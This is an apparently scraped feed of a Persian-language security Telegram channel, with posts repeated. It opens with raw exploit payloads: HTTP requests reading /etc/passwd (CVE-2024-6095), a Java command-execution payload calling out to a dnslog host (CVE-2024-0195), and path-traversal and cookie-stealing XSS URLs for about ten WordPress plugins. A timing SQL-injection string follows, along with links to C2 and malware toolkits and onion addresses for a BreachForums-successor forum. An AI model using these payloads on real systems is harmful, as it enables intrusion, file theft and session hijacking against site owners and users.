CVE-2024-6095
POST /models/apply HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
{"url":"file:///etc/passwd"}
#exploit #poc
@PfkSecurity
POST /models/apply HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
{"url":"file:///etc/passwd"}
#exploit #poc
@PfkSecurity
افزونه های وردپرس
____
simple-image-manipulator
activehelper-livehelp
amministrazione-aperta
anti-plagiarism
buddypress-component-stats
dzs-videogallery
e-search
fancy-product-designer
hd-webplayer
localize-my-post
@PfkSecurity
____
simple-image-manipulator
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd
activehelper-livehelp
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
amministrazione-aperta
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
anti-plagiarism
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
buddypress-component-stats
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
dzs-videogallery
/wp-content/plugins/dzs-videogallery/admin/upload.php
e-search
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
fancy-product-designer
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
hd-webplayer
/wp-content/plugins/hd-webplayer/playlist.php
localize-my-post
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
@PfkSecurity
CVE-2024-0195 Exploit
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
#exploit #poc
@PfkSecurity
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
#exploit #poc
@PfkSecurity
زمان مغز بزرگ
دانیل راین به عنوان مهندس زیرساخت اصلی برای یک شرکت ناشناس استخدام شد. او عمداً اعتبار کنترلر دامنه را تغییر داد تا از کارفرمایش 750000 دلار اخاذی کند.
او اکنون با 30 سال زندان مواجه است.
https://www.bleepingcomputer.com/news/security/employee-arrested-for-locking-windows-admins-out-of-254-servers-in-extortion-plot/
@PfkSecurity
دانیل راین به عنوان مهندس زیرساخت اصلی برای یک شرکت ناشناس استخدام شد. او عمداً اعتبار کنترلر دامنه را تغییر داد تا از کارفرمایش 750000 دلار اخاذی کند.
او اکنون با 30 سال زندان مواجه است.
https://www.bleepingcomputer.com/news/security/employee-arrested-for-locking-windows-admins-out-of-254-servers-in-extortion-plot/
@PfkSecurity
BleepingComputer
Employee arrested for locking Windows admins out of 254 servers in extortion plot
A former core infrastructure engineer at an industrial company headquartered in Somerset County, New Jersey, was arrested after locking Windows admins out of 254 servers in a failed extortion plot targeting his employer.
🔺 امنیت تهاجمی باعث ایجاد امنیت دفاعی می شود 🔻در اینجا مجموعهای از تکنیکهای حمله SaaS به اشتراک گذاشته شده تا به مدافعان کمک کند تا تهدیداتی را که با آن مواجه میشوند درک کنند
🟣 https://github.com/pushsecurity/saas-attacks
🔷 این پروژه مجموعهای از تکنیکهای حمله مختص به Software as a service (SaaS) را معرفی میکند و با استفاده از چارچوب MITRE ATT&CK، به تحلیل تهدیدات امنیتی در محیطهای SaaS میپردازد.
#Saas
#APT
@PfkSecurity
GitHub
GitHub - pushsecurity/saas-attacks: Offensive security drives defensive security. We're sharing a collection of SaaS attack techniques…
Offensive security drives defensive security. We're sharing a collection of SaaS attack techniques to help defenders understand the threats they face. #nolockdown - pushsecurity/saas-attacks
P.F.K Security
🔺 امنیت تهاجمی باعث ایجاد امنیت دفاعی می شود 🔻 در اینجا مجموعهای از تکنیکهای حمله SaaS به اشتراک گذاشته شده تا به مدافعان کمک کند تا تهدیداتی را که با آن مواجه میشوند درک کنند 🟣 https://github.com/pushsecurity/saas-attacks 🔷 این پروژه مجموعهای از تکنیکهای…
🔺 تکنیک SAMLjacking یکی از روش های حملات فیشینگ است که روی قابلیت SSO (Single Sign-On) که اغلب در پلتفرمهای SaaS (نرمافزار به عنوان سرویس) استفاده میشود، تمرکز دارد
در این نوع حمله، مهاجمان از اعتماد کاربران به فرآیندهای SSO سوءاستفاده میکنند تا بهطور غیرمجاز به سیستمهای یک شرکت دسترسی پیدا کنند.
⭕️ مراحل حمله:
مهاجم ابتدا یک حساب کاربری جدید در یک پلتفرم SaaS ایجاد میکند. این پلتفرمها معمولاً شامل ابزارهای مختلفی هستند که شرکتها برای مدیریت فعالیتهای خود استفاده میکنند
💢 مانند Miro، Office 365، یا سایر خدمات مشابه.
⭕️ تنظیمات اولیه:
پس از ثبتنام، مهاجم میتواند تنظیمات مختلف حساب را پیکربندی کند. یکی از این تنظیمات مهم، پیکربندی URL مربوط به SSO (احراز هویت یکپارچه) است.
💢 این آدرسی است که سرویسهای SSO برای احراز هویت کاربران از آن استفاده میکنند. مهاجم میتواند این URL را طوری تنظیم کند که به یک سرور تحت کنترل خود اشاره کند و عملیات فیشینگ را کامل کند
📩 مهاجم میتواند دعوتنامههایی برای پیوستن به این "حساب جدید شرکتی" ارسال کند. این دعوتنامهها به کاربران جدید یا اعضای بالقوه شرکت ارسال میشود.
📮 دعوتنامهها بهطور معمول از دامنهای به نظر میرسد که قانونی و معتبر است (از دامنه سرویسدهنده SaaS).
📌 اگر مهاجم در ابتدا از یک URL سرویسی که به نظر قانونی است استفاده کند و سپس URL SSO را به سرور خود تغییر دهد، کاربران ممکن است فکر کنند که URL SSO تغییر نکرده و بدون شک به ورود ادامه دهند.
⚠️ راهکارهای مقابله:
🔰آگاهی و آموزش: آموزش کارکنان، بهویژه کارکنان جدید، در مورد ریسکهای حملات فیشینگ و چگونگی شناسایی دعوتنامههای مشکوک
🔰 پیکربندی SSO: اطمینان از اینکه پیکربندیهای SSO بهطور دقیق کنترل و نظارت میشوند. هر گونه تغییر در URLهای SSO باید بازبینی و تأیید شود.
🔰 ابزارهای پیشگیری از فیشینگ: استفاده از ابزارهای پیشرفته پیشگیری از فیشینگ که میتوانند ایمیلها یا لینکهای مخرب را قبل از رسیدن به کارکنان شناسایی و مسدود کنند.
🔰 ممیزی SSO: انجام ممیزیهای منظم روی پیکربندیها و لاگهای SSO برای شناسایی هرگونه تغییر غیرمجاز یا فعالیت مشکوک.
👁🗨 https://www.youtube.com/watch?v=4gAeSxbycXU
📚 https://pushsecurity.com/blog/samljacking-a-poisoned-tenant/
#Initial_Access
#APT
در این نوع حمله، مهاجمان از اعتماد کاربران به فرآیندهای SSO سوءاستفاده میکنند تا بهطور غیرمجاز به سیستمهای یک شرکت دسترسی پیدا کنند.
⭕️ مراحل حمله:
مهاجم ابتدا یک حساب کاربری جدید در یک پلتفرم SaaS ایجاد میکند. این پلتفرمها معمولاً شامل ابزارهای مختلفی هستند که شرکتها برای مدیریت فعالیتهای خود استفاده میکنند
💢 مانند Miro، Office 365، یا سایر خدمات مشابه.
⭕️ تنظیمات اولیه:
پس از ثبتنام، مهاجم میتواند تنظیمات مختلف حساب را پیکربندی کند. یکی از این تنظیمات مهم، پیکربندی URL مربوط به SSO (احراز هویت یکپارچه) است.
💢 این آدرسی است که سرویسهای SSO برای احراز هویت کاربران از آن استفاده میکنند. مهاجم میتواند این URL را طوری تنظیم کند که به یک سرور تحت کنترل خود اشاره کند و عملیات فیشینگ را کامل کند
📩 مهاجم میتواند دعوتنامههایی برای پیوستن به این "حساب جدید شرکتی" ارسال کند. این دعوتنامهها به کاربران جدید یا اعضای بالقوه شرکت ارسال میشود.
📮 دعوتنامهها بهطور معمول از دامنهای به نظر میرسد که قانونی و معتبر است (از دامنه سرویسدهنده SaaS).
📌 اگر مهاجم در ابتدا از یک URL سرویسی که به نظر قانونی است استفاده کند و سپس URL SSO را به سرور خود تغییر دهد، کاربران ممکن است فکر کنند که URL SSO تغییر نکرده و بدون شک به ورود ادامه دهند.
⚠️ راهکارهای مقابله:
🔰آگاهی و آموزش: آموزش کارکنان، بهویژه کارکنان جدید، در مورد ریسکهای حملات فیشینگ و چگونگی شناسایی دعوتنامههای مشکوک
🔰 پیکربندی SSO: اطمینان از اینکه پیکربندیهای SSO بهطور دقیق کنترل و نظارت میشوند. هر گونه تغییر در URLهای SSO باید بازبینی و تأیید شود.
🔰 ابزارهای پیشگیری از فیشینگ: استفاده از ابزارهای پیشرفته پیشگیری از فیشینگ که میتوانند ایمیلها یا لینکهای مخرب را قبل از رسیدن به کارکنان شناسایی و مسدود کنند.
🔰 ممیزی SSO: انجام ممیزیهای منظم روی پیکربندیها و لاگهای SSO برای شناسایی هرگونه تغییر غیرمجاز یا فعالیت مشکوک.
👁🗨 https://www.youtube.com/watch?v=4gAeSxbycXU
📚 https://pushsecurity.com/blog/samljacking-a-poisoned-tenant/
#Initial_Access
#APT
YouTube
SAMLjacking a poisoned tenant demo
Find more techniques: https://github.com/pushsecurity/saas-attacks
Read our blog post: https://pushsecurity.com/blog/saas-attack-techniques/
Read our blog post: https://pushsecurity.com/blog/saas-attack-techniques/
توسعه بدافزار برای هکرهای اخلاقی، منتشر شده توسط Packt
https://github.com/PacktPublishing/Malware-Development-for-Ethical-Hackers
@pfksecurity
https://github.com/PacktPublishing/Malware-Development-for-Ethical-Hackers
@pfksecurity
GitHub
GitHub - PacktPublishing/Malware-Development-for-Ethical-Hackers: Malware Development for Ethical Hackers, published by Packt
Malware Development for Ethical Hackers, published by Packt - PacktPublishing/Malware-Development-for-Ethical-Hackers
سوء استفاده از کنترل کننده های استثنا (رویکرد بدافزار به SEH)
https://moval0x1.github.io/posts/the-abuse-of-exception-handlers/
@pfksecurity
https://moval0x1.github.io/posts/the-abuse-of-exception-handlers/
@pfksecurity
The Reverser's Draft
The Abuse of Exception Handlers
How Exception Handlers can be abused in low-level stuff
Tricky ASP blind SQL Injection in a login page.
Payload👇
';%20waitfor%20delay%20'0:0:6'%20--%20
@pfksecurity
Payload👇
';%20waitfor%20delay%20'0:0:6'%20--%20
@pfksecurity
https://mail2torjgmxgexntbrmhvgluavhj7ouul5yar6ylbvjkxwqf6ixkwyd.onion
Mail2Tor
یک سرویس ایمیل ناشناس رایگان برای محافظت از حریم خصوصی شما است. وب سایت برای ثبت نام نیازی به اطلاعات اضافی ندارد، فقط به نام کاربری و رمز عبور نیاز دارد.
@PfkSecurity
Mail2Tor
یک سرویس ایمیل ناشناس رایگان برای محافظت از حریم خصوصی شما است. وب سایت برای ثبت نام نیازی به اطلاعات اضافی ندارد، فقط به نام کاربری و رمز عبور نیاز دارد.
@PfkSecurity
🕵️♂️ فایل های خود را از هر نوع در تصویر دلخواه خود با استفاده از استگانوگرافی مخفی کنید
https://github.com/JoshuaKasa/van-gonography
#steganography
@PfkSecurity
https://github.com/JoshuaKasa/van-gonography
#steganography
@PfkSecurity
GitHub
GitHub - JoshuaKasa/van-gonography: Hide 🕵️♂️ your files of any type inside a image of your choice using steganography
Hide 🕵️♂️ your files of any type inside a image of your choice using steganography - GitHub - JoshuaKasa/van-gonography: Hide 🕵️♂️ your files of any type inside a image of your choice using ste...
Bear C2
مجموعهای از اسکریپتهای C2، پیلودها و مرحلههای مورد استفاده در حملات شبیهسازی شده توسط گروههای APT روسیه است.
https://github.com/S3N4T0R-0X0/BEAR
#APT
@PfkSecurity
مجموعهای از اسکریپتهای C2، پیلودها و مرحلههای مورد استفاده در حملات شبیهسازی شده توسط گروههای APT روسیه است.
https://github.com/S3N4T0R-0X0/BEAR
#APT
@PfkSecurity
GitHub
GitHub - S3N4T0R-0X0/BEAR: Bear C2 is a compilation of C2 scripts, payloads, and stagers used in simulated attacks by Russian APT…
Bear C2 is a compilation of C2 scripts, payloads, and stagers used in simulated attacks by Russian APT groups, Bear features a variety of encryption methods, including AES, XOR, DES, TLS, RC4, RSA ...
این مخزن مجموعه ای از تمام شبیه سازی های APT است که بسیاری از بخش های حیاتی، اعم از خصوصی و دولتی را هدف قرار می دهد. این شبیهسازی شامل ابزارهای نوشتاری، سرورهای C2، بکدورها، تکنیکهای بهرهبرداری، استیدرها، بوتلودرها و بسیاری از ابزارهای دیگر است که مهاجمان ممکن است در حملات واقعی استفاده کرده باشند. این ابزارها و TTP ها در اینجا شبیه سازی شده اند.
https://github.com/S3N4T0R-0X0/APT-Attack-Simulation
#exploit #APT
@PfkSecurity
https://github.com/S3N4T0R-0X0/APT-Attack-Simulation
#exploit #APT
@PfkSecurity
GitHub
GitHub - S3N4T0R-0X0/APTs-Adversary-Simulation: This repository contains detailed adversary simulation APT campaigns targeting…
This repository contains detailed adversary simulation APT campaigns targeting various critical sectors. Each simulation includes custom tools, C2 servers, backdoors, exploitation techniques, stage...
⚠️تلگرام⚠️Astounding از SecretForums اعلام کرده است که به اعضای سابق BreachForums رتبه ای مشابه با آنچه در سایت داشتند می دهد.
secretsmt222qvdg6rcmgvx4dqqc2673yzyxjrrnabwklnn6qddyv5ad.onion
@PfkSecurity
secretsmt222qvdg6rcmgvx4dqqc2673yzyxjrrnabwklnn6qddyv5ad.onion
@PfkSecurity
💡MyIP💡
"بررسی آسان IP های شما، موقعیت جغرافیایی IP، بررسی نشت DNS، بررسی اتصالات WebRTC، تست سرعت، تست پینگ، تست MTR، بررسی در دسترس بودن وب سایت، جستجوی whois و موارد دیگر!"
GitHub: https://github.com/jason5ng32/MyIP
@PfkSecurity
"بررسی آسان IP های شما، موقعیت جغرافیایی IP، بررسی نشت DNS، بررسی اتصالات WebRTC، تست سرعت، تست پینگ، تست MTR، بررسی در دسترس بودن وب سایت، جستجوی whois و موارد دیگر!"
GitHub: https://github.com/jason5ng32/MyIP
@PfkSecurity
GitHub
GitHub - jason5ng32/MyIP: The best IP Toolbox. Easy to check what's your IPs, IP geolocation, check for DNS leaks, examine WebRTC…
The best IP Toolbox. Easy to check what's your IPs, IP geolocation, check for DNS leaks, examine WebRTC connections, speed test, ping test, MTR test, check website availability, whois searc...